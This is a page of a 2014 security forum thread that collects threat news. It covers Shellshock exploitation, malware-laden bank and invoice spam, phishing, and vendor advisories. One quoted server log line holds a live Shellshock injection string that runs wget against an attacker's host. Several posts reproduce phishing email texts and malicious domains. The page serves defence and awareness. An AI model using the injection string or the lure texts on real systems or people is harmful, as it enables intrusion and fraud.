News: Cexx forums, with volunteers dedicated to helping you remove malware and stay protected
 
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
October 31, 2014, 11:10:25
Pages: 1 ... 7 8 [9] 10
 81 
 on: September 28, 2014, 02:35:20  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Shellshock and MangoHost (mangohost .net) / 83.166.234.0/24
- http://blog.dynamoo.com/2014/09/evil-network-shellshock-and-mangohost.html
28 Sep 2014 - "I came across this particular sewer while looking in my logs for Shellshock access attempts yesterday... probing my server at attempting to WGET back to their own network to enumerate vulnerable hosts.
   dynamoo.com:80 83.166.234.133 - - [27/Sep/2014:03:08:37 +0100] "GET / HTTP/1.0" 200 11044 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http ://ad.dipad .biz/test/http ://dynamoo .com/\""
ad.dipaz .biz is hosted on 83.166.234.186, so pretty close to the probing IP of 83.166.234.133 which made me suspicious of the whole range... MangoHost claims to be in Moldova, but almost everything to do with them is in Russian, indicating perhaps that whoever runs this is part of the large Russian ethnic minority in Moldova*. MangoHost is run by one Victor Letkovski (виктор летковский) who lives in Chisinau. Until the past few days, MangoHost was hosting the -ransomware- sites listed here** [pastebin]. Paste customers include the infamous Darkode forum back in June, and indeed it still hosts jab.darkode .com, whatever that may be (you can guarantee it is nothing good). Currently hosted domains include a collection of -fake- browser plugins, some -malvertising- sites, some porn, spam sites, hacker resources, -ransomware- domains and what might appear to be some fake Russian law firms... I would strongly recommend blocking all traffic to and from 83.166.234.0/24 if you can do it."
(More detail at the dynamoo URL above.)
* https://en.wikipedia.org/wiki/Russians_in_Moldova

** http://pastebin.com/2mC1pXaJ

83.166.234.186: https://www.virustotal.com/en/ip-address/83.166.234.186/information/

83.166.234.133: https://www.virustotal.com/en/ip-address/83.166.234.133/information/
___

Shellshock in the Wild
- http://www.fireeye.com/blog/uncategorized/2014/09/shellshock-in-the-wild.html
Sep 27, 2014 - "... We have observed a significant amount of overtly malicious traffic leveraging BASH, including:
- Malware droppers
- Reverse shells and backdoors
- Data exfiltration
- DDoS
Some of this suspicious activity appears to be originating from Russia. We suspect bad actors may be conducting an initial dry run, in preparation for a real, potentially larger-scale attack. We believe it’s only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise... Exploitation Techniques: The Shellshock traffic we have been able to observe is still quite chaotic. It is largely characterized by high volume automated scans and PoC-like exploit scripts... payload is a very small ELF executable (md5: 959aebc9b44c2a5fdd23330d9be1101e) that was submitted to VirusTotal yesterday with 0 detections. It simply creates a reverse shell, connecting to the same IP the payload was downloaded from: 82.118.242.223... We will continue monitoring the threats and keep you updated..."
(More detail at the fireeye URL above.)

- http://www.symantec.com/connect/blogs/shellshock-all-you-need-know-about-bash-bug-vulnerability
Updated: 29 Sep 2014 - "... Businesses, in particular website owners, are most at risk from this bug and should be aware that its exploitation may allow access to their data and provide attackers with a foothold on their network. Accordingly, it is of critical importance to apply any available patches immediately. Linux vendors have issued security advisories for the newly discovered vulnerability including patching information.
Debian: https://www.debian.org/security/2014/dsa-3032
Ubuntu: http://www.ubuntu.com/usn/usn-2362-1/
Red Hat: https://access.redhat.com/articles/1200223*
CentOS: http://centosnow.blogspot.com/2014/09/critical-bash-updates-for-centos-5.html
Novell SUSE: http://support.novell.com/security/cve/CVE-2014-6271.html
*Red Hat has updated its advisory to include fixes for a number of remaining issues:
- https://rhn.redhat.com/errata/RHSA-2014-1306.html
Last updated on: 2014-09-30
If a patch is unavailable for a specific distribution of Linux or Unix, it is recommended that users switch to an alternative shell until one becomes available.
For consumers: Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available.
Symantec Protection: Symantec has created an Intrusion Prevention signature for protection against this vulnerability:
27907 - OS Attack: GNU Bash CVE-2014-6271
> http://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=27907
Symantec will continue to investigate this vulnerability and provide more details as they become available."

 Evil or Very Mad  Sad

 82 
 on: September 27, 2014, 05:27:25  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Oracle - Security Alert CVE-2014-7169 released
- https://blogs.oracle.com/security/entry/security_alert_cve_2014_7169
Sep 26, 2014 - "Oracle just released Security Alert CVE-2014-7169*. Vulnerability CVE-2014-7169, previously known as CVE-2014-6271, affects GNU Bash, and if successfully exploited can result in providing a malicious attacker the ability to fully compromise a targeted system... Today’s Security Alert lists the products that Oracle has currently determined to be vulnerable to CVE-2014-7169. Download and installation instructions are provided for those products with available patches. Note that the fixes provided with this Security Alert address both vulnerabilities CVE-2014-7169 and CVE-2014-6271. The Security Alert Advisory will be updated to reflect the availability of fixes for additional products when they have successfully completed testing..."  
* http://www.oracle.com/technetwork/topics/security/alert-cve-2014-7169-2303276.html
2014-Sep-30 - Rev. 5 - Added additional CVEs to Solaris and Linux matrices
CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187

- http://www.oracle.com/technetwork/topics/security/alert-cve-2014-7169-2303276.html#PIN
"Oracle has determined that following Oracle products are vulnerable to CVE-2014-7169 and CVE-2014-6271. Fixes for these products will be distributed as they become available and this Security Alert will be updated to reflect the availability of these fixes..."
2014-Sep-30 - Rev 5. Added additional CVEs to Solaris and Linux matrices

- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271 - 10.0 (HIGH)
Last revised: 10/10/2014
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169 - 10.0 (HIGH)
Last revised: 10/10/2014

* http://www.oracle.com/technetwork/topics/security/bashcve-2014-7169-2317675.html
"... list of affected products and mitigation instructions as of October 20, 2014 at 06:38 PM Pacific..."

> https://linux.oracle.com/pls/apex/f?p=105:21:3597568493916265
Last entry: 2014-10-20

- http://www.oracle.com/technetwork/topics/security/alert-cve-2014-7169-verbose-2303278.html#SUNS

Advisory (ICSA-14-269-01)
Bash Command Injection Vulnerability
- https://ics-cert.us-cert.gov//advisories/ICSA-14-269-01
Last revised: Oct 03, 2014

 Exclamation Exclamation

 83 
 on: September 26, 2014, 17:13:59  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Huge Update – 1789 Domains
- http://www.malwaredomains.com/?p=3663
September 25th, 2014 - "... -1789- domains were added two days ago. Sources: www.spamhaus.org, safebrowsing.google.com, osint.bambenekconsulting.com..."

 Exclamation

 84 
 on: September 26, 2014, 04:02:44  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Amazon phish ...
- http://myonlinesecurity.co.uk/amazon-account-confirmation-phishing/
26 Sep 2014 - "'Account Confirmation' pretending to come from Amazon .co.uk <auto-confirm@ amazon .co.uk> is a phishing email designed to get your Amazon log in details and then your bank, credit card, address and personal details so they can imitate you and take over your accounts and clean you out...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/Amazon-Account-Confirmation.png

Following the link in this Amazon Account Confirmation or other spoofed emails takes you  to a website that looks -exactly- like the real Amazon.co.uk site. You are then through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your Amazon account, but also your Bank Account, Email details, webspace (if you have it) They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email or follow links in them ..."
___

Fake docs, voicemail, fax SPAM ...
- http://blog.dynamoo.com/2014/09/malware-spam-employee-documents.html
26 Sep 2014 - "... different types of spam to increase click through rates and now some tricky tools to prevent analysis of the malware.

 Employee Documents - Internal Use
From:     victimdomain
Date:     26 September 2014 09:41
Subject:     Employee Documents - Internal Use
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Employee Documents ...
Documents are encrypted in transit and store in a secure repository...

 You have a new voice
From:     Voice Mail [Voice.Mail@ victimdomain]
Date:     26 September 2014 09:30
Subject:     You have a new voice
You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
* The reference number for this message is _qvs4004011004_001
The transmission length was 26
Receiving machine ID : ES7D-ZNA1D-QF3E
To download and listen your voice mail please follow the link ...

 RBS: BACS Transfer : Remittance for JSAG244GBP
From:     Douglas Byers [creditdepart@ rbs .co.uk]
Date:     26 September 2014 10:12
Subject:     BACS Transfer : Remittance for JSAG244GBP
We have arranged a BACS transfer to your bank for the following amount : 4596.00
Please find details at our secure link ...

 New Fax
From:     FAX Message [fax@victimdomain]
Date:     26 September 2014 10:26
Subject:     New Fax
You have received a new fax .
Date/Time: Fri, 26 Sep 2014 16:26:36 +0700.
Your Fax message can be downloaded here ...


... The attack has evolved recently.. usually these malicious links forwarded on to another site which had the malicious payload. Because all the links tended to end up at the same site, it was quite easy to block that site and foil the attack. But recently the payload is spread around many different sites making it harder to block. A new one today is that the landing page is somewhat obfuscated to make it harder to analyse, and this time the download is a plain old .scr file rather than a .zip. I've noticed that many anti-virus products are getting quite good at detecting the malicious ZIP files with a generic detection, but not the binary within. By removing the ZIP wrapper, the bad guys have given one less hook for AV engines to find.. malicious binary document7698124-86421_pdf.scr is downloaded from the remote site which has a VirusTotal detection rate of 2/55*. The Anubis report shows the malware attempting to phone home to padav .com which is probably worth blocking."
* https://www.virustotal.com/en-gb/file/9819d4027893bcb20cdefc49632008e71672fb3eaefbbb0ef1b626a52dd6c6c4/analysis/1411724904/
... Behavioural information
DNS requests
padav .com (184.106.55.51)
TCP connections
188.165.198.52: https://www.virustotal.com/en-gb/ip-address/188.165.198.52/information/
184.106.55.51: https://www.virustotal.com/en-gb/ip-address/184.106.55.51/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en-gb/ip-address/137.170.185.211/information/
___

Bill.com Spam
- http://threattrack.tumblr.com/post/98466527048/bill-com-spam
Sep 26, 2014 - "Subjects Seen:
   Payment Details [Incident: 711935-599632]
Typical e-mail details:
   We could not process your Full Payment Submission. The submission for reference ***/UT5236489 was successfully received and was not processed. Check attached copy (PDF Document) for more information.
    Regards,
    Bill.com Payment Operations


Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/8d0ecbce8726c0f09eda8b8e4dbc7c45/tumblr_inline_ncigloYHaW1r6pupn.png

Malicious File Name and MD5:
    bill_com_Payment_Details_711935-599632.zip (02EE805D1EACD739BEF4697B26AAC847)
    bill_com_payment_details_ID0000012773616632715381235.pdf.exe (AD24CD2E14DCBF199078BDBBAE4BF0CA)


Tagged: bill.com, Vawtrak
___

More Fakes - HMRC, BT, RBS SPAM
- http://blog.dynamoo.com/2014/09/malware-spam-hmrc-taxes-application.html
26 Sep 2014 - "Another bunch of spam emails, with the same payload* at this earlier spam run*.

HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
From:     noreply@ taxreg .hmrc .gov.uk [noreply@ taxreg .hmrc .gov.uk]
Date:     26 September 2014 12:26
Subject:     HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
The application with reference number LZV9 0Q3E W5SD N3GV submitted by you or your agent to register for HM Revenue & Customs (HMRC) taxes has been received and will now be verified. HMRC will contact you if further information is needed.
Please download/view your HMRC documents here ...

 Important - BT Digital File
From:     Cory Sylvester [Cory.Sylvester@ bt .com]
Date:     26 September 2014 12:51
Subject:     Important - BT Digital File
Dear Customer,
This email contains your BT Digital File. Please scan attached file and reply to this email.
To download your BT Digital File please follow the link ...

 RBS Bankline: Outstanding invoice
    From:     Bankline.Administrator@ rbs .co.uk [Bankline.Administrator@ rbs .co.uk]
    To:     <REDACTED>
    Date:     26 September 2014 13:05
    Subject:     Outstanding invoice
       {_BODY_TXT}
    Dear [redacted],
    Please find the attached copy invoice which is showing as unpaid on our ledger.
    To download your invoice please click here ...


In the sample I looked at the malware page downloaded an archive document26092014-008_pdf.zip which in turn contains document26092014-008_pdf.exe which is the same payload* as earlier..."
* http://blog.dynamoo.com/2014/09/malware-spam-employee-documents.html
___

Fake Barclays SPAM – PDF malware
- http://myonlinesecurity.co.uk/barclays-transaction-complete-fake-pdf-malware/
26 Sep 2014 - "'Barclays Transaction not complete' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Unable to complete your most recent Transaction.  Currently your transaction has a pending status.
    If the transaction was made by mistake please contact our customer service.
    For more details please download payment receipt ...


26 September 2014: PaymentReceipt262.zip:  Extracts to: PaymentReceipt262.exe
Current Virus total detections: 2/55* . This 'Barclays Transaction not complete' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/5149eb19e642e141818326b4ad670e9b74496881ea1de69c13786f021efda559/analysis/1411738617/
... Behavioural information
DNS requests
wcdnitaly .org (195.110.124.133)
TCP connections
188.165.198.52: https://www.virustotal.com/en/ip-address/188.165.198.52/information/
195.110.124.133: https://www.virustotal.com/en/ip-address/195.110.124.133/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/

 Evil or Very Mad Evil or Very Mad  Sad

 85 
 on: September 26, 2014, 02:29:01  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

- http://tools.cisco.com/security/center/publicationListing.x

GNU Bash Environmental Variable Command Injection Vuln
Advisory ID: cisco-sa-20140926-bash
- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
2014 Sep 26 - "Summary: On September 24, 2014, a vulnerability in the Bash shell was publicly announced. The vulnerability is related to the way in which shell functions are passed though environment variables. The vulnerability may allow an attacker to inject commands into a Bash shell, depending on how the shell is invoked. The Bash shell may be invoked by a number of processes including, but not limited to, telnet, SSH, DHCP, and scripts hosted on web servers.
All versions of GNU Bash starting with version 1.14 are affected by this vulnerability and the specific impact is determined by the characteristics of the process using the Bash shell. In the worst case, an unauthenticated remote attacker would be able to execute commands on an affected server. However, in most cases involving Cisco products, exploitation of the vulnerability results in an authenticated attacker having the ability to execute commands for which they are not authorized. A number of Cisco products ship with or leverage an affected version of the Bash shell. This advisory will be updated as additional information becomes available. Cisco may release free software updates that address this vulnerability if a product is determined to be affected by this vulnerability...
(See "Affected Products" list at the URL above.)
Rev 1.12 - 2014-Oct-15 - Updated details on where to find fix information, details on testing tools, and the Affected Products, Vulnerable Products, and Products Confirmed Not Vulnerable sections.

Cisco IronPort - GNU bash...
- http://www.securitytracker.com/id/1030961
Oct 2 2014

Cisco WebEx Meetings Server ...
- http://www.securitytracker.com/id/1030940
CVE Reference: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3395
Oct 1 2014
- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014-3395
Last Updated: 2014 Sep 30

- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3400
Last revised: 10/06/2014
- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014-3400
Last Updated: 2014 Oct 3

Advisory (ICSA-14-269-01)
Bash Command Injection Vulnerability
- https://ics-cert.us-cert.gov//advisories/ICSA-14-269-01
Last revised: Oct 03, 2014

Also see: https://www.us-cert.gov/ncas/current-activity/2014/09/24/Bourne-Again-Shell-Bash-Remote-Code-Execution-Vulnerability
Last revised: Sep 30, 2014

- https://www.us-cert.gov/ncas/alerts/TA14-268A
Last revised: Sep 30, 2014

- http://www.kb.cert.org/vuls/id/252743
Last revised: 10 Oct 2014

Bash vuln -aka- Shellshock ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/shell-attack-on-your-server-bash-bug-cve-2014-7169-and-cve-2014-6271/
Sep 25, 2014
> http://about-threats.trendmicro.com/us/threat-intelligence/internet-of-everything/attack-scenarios/the-shellshock-vulnerability-bash-bug

FREE protection for Shellshock
- http://www.trendmicro.com/us/security/shellshock-bash-bug-exploit/index.html

- http://www.securitytracker.com/id/1030890
CVE Reference:
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6277 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6278 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7186 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7187 - 10.0 (HIGH)
Updated: Oct 6 2014 - "... archive entry has one or more follow-up message(s) listed..."
Original Entry Date: Sep 24 2014
Impact: Execution of arbitrary code via local system, Execution of arbitrary code via network, User access via local system, User access via network
Vendor Confirmed: Yes Exploit Included: Yes  
Version(s): 4.3 ...
... vulnerability is being actively exploited...
Vendor URL: https://www.gnu.org/software/bash/
___

Semiannual Cisco IOS Software Security Advisory Bundled Publication
- http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_sep14.html
Sep 24, 2014 - "... Use the Cisco IOS Software Checker* to quickly determine whether a given Cisco IOS Software release is exposed to Cisco product vulnerabilities..."
* http://tools.cisco.com/security/center/selectIOSVersion.x

 Exclamation Exclamation

 86 
 on: September 25, 2014, 04:33:12  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Fake Bank transfers/invoice SPAM ...
- http://blog.dynamoo.com/2014/09/malware-spam-rbs-bacs-transfer-sage.html
25 Sep 2014 - "... very aggressive spam run this morning, with at least -four- different email formats pushing the -same- malicious download.

RBS / Riley Crabtree: "BACS Transfer : Remittance for JSAG814GBP"
    From:     Riley Crabtree [creditdepart@ rbs .co.uk]
    Date:     25 September 2014 10:58
    Subject:     BACS Transfer : Remittance for JSAG814GBP
    We have arranged a BACS transfer to your bank for the following amount : 4946.00
    Please find details at our secure link ...

 Sage Account & Payroll: "Outdated Invoice"
    From:     Sage Account & Payroll [invoice@ sage .com]
    Date:     25 September 2014 10:53
    Subject:     Outdated Invoice
    Sage Account & Payroll
    You have an outdated invoice from Sage Accounting that is ready for payment. To find out more details on this invoice, please follow the link ...

Screenshot: https://1.bp.blogspot.com/-8Mx-CTYIitE/VCPrdXzlOiI/AAAAAAAAFvA/YGCgcp8GX2s/s1600/sage2.png

 Lloyds Commercial Bank: "Important - Commercial Documents"
    From:     Lloyds Commercial Bank [secure@ lloydsbank .com]
    Date:     25 September 2014 11:36
    Subject:     Important - Commercial Documents
    Important account documents
    Reference: C400
    Case number: 05363392
    Please review BACs documents.
    Click link below ...

 NatWest Invoice: "Important - New account invoice
    From:     NatWest Invoice [invoice@ natwest .com]
    Date:     25 September 2014 10:28
    Subject:     Important - New account invoice
    Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
    To view/download your invoice please click here ...


The links in the emails go to different download locations to make it harder to block... In each case the page then downloads the victim to download file Invoice_09252014.zip from the same directory as the html file. This ZIP file contains a malicious executable Invoice_09252014.scr which currently has a VirusTotal detection rate of 3/54*. The Anubis report shows that it phones home to ukrchina-logistics .com which is probably worth blocking or monitoring access to."
* https://www.virustotal.com/en-gb/file/1397ff56e47b642ff1f4eaaaedc3b84fc5cd7c619b25a894a57dabe62987d84c/analysis/1411638249/
... Behavioural information
DNS requests
ukrchina-logistics .com
TCP connections
188.165.198.52: https://www.virustotal.com/en-gb/ip-address/188.165.198.52/information/
91.196.0.119

- http://threattrack.tumblr.com/post/98386009528/sage-software-invoice-spam
Sep 25, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/c600697c85ad23d80119101ea06360d0/tumblr_inline_ncglljx1ql1r6pupn.png
Tagged: Sage, Upatre
___

Fake BCA SPAM - PDF malware
- http://myonlinesecurity.co.uk/bca-banking-24-09-14-fake-pdf-malware/
25 Sep 2014 - "'BCA Banking 24.09.14' pretending to come from hallsaccounts <hallsaccounts@ hallsgb .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Accounts Dept
    Halls Holdings Ltd
    Tel: 01743 450700
    Fax: 01743 443759 ...


25 September 2014: BCA Banking 24.09.14.pdf.zip : Extracts to: BCA Banking 24.09.14.pdf.exe
Current Virus total detections: 4/53* . This BCA Banking 24.09.14 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like an image of a barcode to try to fool you instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/cfd9d4f6fc16e6cf4f5960b5c1b3ad5724f86ec0eefd6e87ab154c4b1e156443/analysis/1411646762/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake voice mail SPAM – wav malware
- http://myonlinesecurity.co.uk/outlook-received-voice-mail-fake-wav-malware/
25 Sep 2014 - "'You have received a voice mail' pretending to come from Microsoft Outlook [no-reply@ Your domain] is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
     You received a voice mail : VOICE7838396453.wav (26 KB)
    Caller-Id: 7838396453
    Message-Id: ID9CME
    Email-Id: [redacted]
    This e-mail contains a voice message.
    Download and extract the attachment to listen the message.
    Sent by Microsoft Exchange Server


25 September 2014 VOICE7838396453.zip (56kb): Extracts to: voicemessage.scr
Current Virus total detections: 1/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav (sound) file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c97b0291ac92a49293a1c8e5a9145241d2e09f9b53df8c13c70ca33701090773/analysis/1411657167/
... Behavioural information
TCP connections
23.21.52.195: https://www.virustotal.com/en/ip-address/23.21.52.195/information/
95.100.255.137: https://www.virustotal.com/en/ip-address/95.100.255.137/information/
194.150.168.70: https://www.virustotal.com/en/ip-address/194.150.168.70/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake Gov't e-mail SCAM
- https://www.ic3.gov/media/2014/140924.aspx
Sep 24, 2014 - "Cybercriminals posing as Internet Crime Complaint Center (IC3) employees are defrauding the public. The IC3 has received complaints from victims who were receiving e-mails purported to be from the IC3...  Victims report that the unsolicited e-mail sender is a representative of the IC3. The e-mails state that a criminal report was filed on the victim’s name and social security number and legal papers are pending. Scammers impersonate an IC3 employee to increase credibility and use threats of legal action to create a sense of urgency. Victims are informed they have one to two days from the date of the complaint to contact the scammers. Failure to respond to the e-mail will result in an arrest warrant issued to the victim. Some victims stated they were provided further details regarding the ‘criminal charges’ to include violations of federal banking regulations, collateral check fraud, and theft deception. Other victims claimed that their address was correct but their social security number was incorrect. Victims that requested additional information from the scammer were instructed to obtain prepaid money cards to avoid legal action. Victims have reported this -scam- in multiple states...  If you receive this type of e-mail:
- Resist the pressure to act quickly.
- -Never- wire money based on a telephone request or in an e-mail, especially to an overseas location.
The IC3 -never- charges the public for filing a complaint and will -never- threaten to have them arrested if they do not respond to an e-mail..."

 Evil or Very Mad  Sad

 87 
 on: September 25, 2014, 02:25:24  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

iOS 8.0.1 revoked - iPhone 6, 6+
- http://www.theinquirer.net/inquirer/news/2372128/apple-yanks-ios-801-after-update-borks-iphone-connectivity-touch-id
Sep 25, 2014 - "... iPhone 6 and iPhone 6 Plus users that downloaded the iOS 8.0.1 update and found that it somewhat ruined their days to roll back the update*. Apple released iOS 8.0.1 to iPhones on Wednesday, but all didn't go to plan. While speculation had suggested that the update would arrive with a slew of bug fixes, the update appears to have created more issues. Apple has accepted that some iPhone users have experienced loss of connectivity and breakage in Touch ID sign-in..."
* http://support.apple.com/kb/HT6487
Sep 25, 2014
___

- http://support.apple.com/kb/HT6487
Last Modified: Sep 26, 2014 - "iOS 8.0.2 is available now. It fixes the loss of cellular service and use of Touch ID that may have affected you if you have an iPhone 6 or iPhone 6 Plus and you downloaded iOS 8.0.1. It includes improvements and bug fixes originally in iOS 8.0.1. We apologize for inconveniencing you if you were affected by the bug in iOS 8.0.1. To resolve this issue, update your device to iOS 8.0.2* or later."
* http://support.apple.com/kb/HT4623

- https://discussions.apple.com/search.jspa?facet=content&type=discussion&sort=relevanceDesc&showAnsweredFirst=true&q=iOS%208.0.2%20problems
___

APPLE-SA-2014-09-23-1 OS X: Flash Player plug-in blocked
- https://lists.apple.com/archives/security-announce/2014/Sep/msg00000.html
Sep 23, 2014
Due to security issues in older versions, Apple has updated the
web plug-in blocking mechanism to disable all versions prior to
Flash Player 15.0.0.152 and 13.0.0.244.

Information on blocked web plug-ins will be posted to:
- http://support.apple.com/kb/HT5655
Last Modified: Sep 24, 2014

 Exclamation  Sad

 88 
 on: September 25, 2014, 00:18:37  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

- http://tools.cisco.com/security/center/publicationListing.x

Cisco IOS Software NAT DoS vuln
- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-nat
2014 Sep 24 - "Summary: A vulnerability in the Network Address Translation (NAT) feature of Cisco IOS Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper translation of IP version 4 (IPv4) packets. Cisco has released free software updates that address this vulnerability..."
- http://www.securitytracker.com/id/1030896
CVE Reference: CVE-2014-3361
Sep 24 2014
Impact: Denial of service via network
Fix Available: Yes Vendor Confirmed: Yes...

Cisco IOS Software SIP DoS vuln
- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-sip
2014 Sep 24 - "Summary: A vulnerability in the Session Initiation Protocol (SIP) implementation in Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device. To exploit this vulnerability, affected devices must be configured to process SIP messages. Cisco has released free software updates that address this vulnerability. There are no workarounds for devices that must run SIP; however, mitigations are available to limit exposure to this vulnerability..."
- http://www.securitytracker.com/id/1030897
CVE Reference: CVE-2014-3360
Sep 24 2014
Impact: Denial of service via network
Fix Available: Yes Vendor Confirmed: Yes...

Cisco IOS Software mDNS - multiple vulns
- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-mdns
2014 Sep 24 - "Summary: The Cisco IOS Software implementation of the multicast Domain Name System (mDNS) feature contains the following vulnerabilities when processing mDNS packets that could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition:
- Cisco IOS Software mDNS Gateway Memory Leak Vulnerability
- Cisco IOS Software mDNS Gateway Denial of Service Vulnerability
Cisco has released free software updates that address these vulnerabilities..."
- http://www.securitytracker.com/id/1030898
CVE Reference: CVE-2014-3357, CVE-2014-3358
Sep 24 2014
Impact: Denial of service via network
Fix Available: Yes Vendor Confirmed: Yes...

Cisco IOS Software Metadata vulns
- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-metadata
2014 Sep 24 - "Summary: Two vulnerabilities in the metadata flow feature of Cisco IOS Software could allow an unauthenticated, remote attacker to reload a vulnerable device. The vulnerabilities are due to improper handling of transit RSVP packets that need to be processed by the metadata infrastructure. An attacker could exploit these vulnerabilities by sending malformed RSVP packets to an affected device. A successful exploit could allow the attacker to cause an extended denial of service (DoS) condition. Cisco has released free software updates that address these vulnerabilities. Workarounds that mitigate these vulnerabilities are not available..."
- http://www.securitytracker.com/id/1030894
CVE Reference: CVE-2014-3355, CVE-2014-3356
Sep 24 2014
Impact: Denial of service via network
Fix Available: Yes Vendor Confirmed: Yes...

Cisco IOS Software RSVP vuln
- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-rsvp
2014 Sep 24 - "Summary: A vulnerability in the implementation of the Resource Reservation Protocol (RSVP) in Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker cause the device to reload. This vulnerability could be exploited repeatedly to cause an extended denial of service (DoS) condition. Cisco has released free software updates that address this vulnerability. A workaround that mitigates this vulnerability is available..."
- http://www.securitytracker.com/id/1030893
CVE Reference: CVE-2014-3354
Sep 24 2014
Impact: Denial of service via network
Fix Available: Yes Vendor Confirmed: Yes...

Cisco IOS Software DHCPv6 DoS vuln
- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-dhcpv6
2014 Sep 24 - "Summary: A vulnerability in the DHCP version 6 (DHCPv6) server implementation of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition. The vulnerability is due to improper parsing of malformed DHCPv6 packets. An attacker could exploit this vulnerability by sending malformed DHCPv6 packets to be processed by an affected device. An exploit could allow the attacker to cause a memory leak and eventual reload of an affected device. Cisco has released free software updates that address this vulnerability..."
- http://www.securitytracker.com/id/1030895
CVE Reference: CVE-2014-3359
Sep 24 2014
Impact: Denial of service via network
Fix Available: Yes Vendor Confirmed: Yes...

 Exclamation Exclamation

 89 
 on: September 24, 2014, 15:29:02  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Chrome 37.0.2062.124 released
- http://googlechromereleases.blogspot.com/2014/09/stable-channel-update_24.html
Sep 24, 2014 - "The stable channel has been updated to 37.0.2062.124 for Windows and Mac.
This build contains a security change:
[414124] RSA signature malleability in NSS (CVE-2014-1568)..."

> https://www.us-cert.gov/ncas/current-activity/2014/09/24/Mozilla-Network-Security-Services-NSS-Library-Vulnerability
Sep 24, 2014

- http://www.kb.cert.org/vuls/id/772676
24 Sep 2014 - "... This vulnerability may allow an attacker to forge a RSA signature, such as a SSL certificate..."

- http://www.securitytracker.com/id/1030900
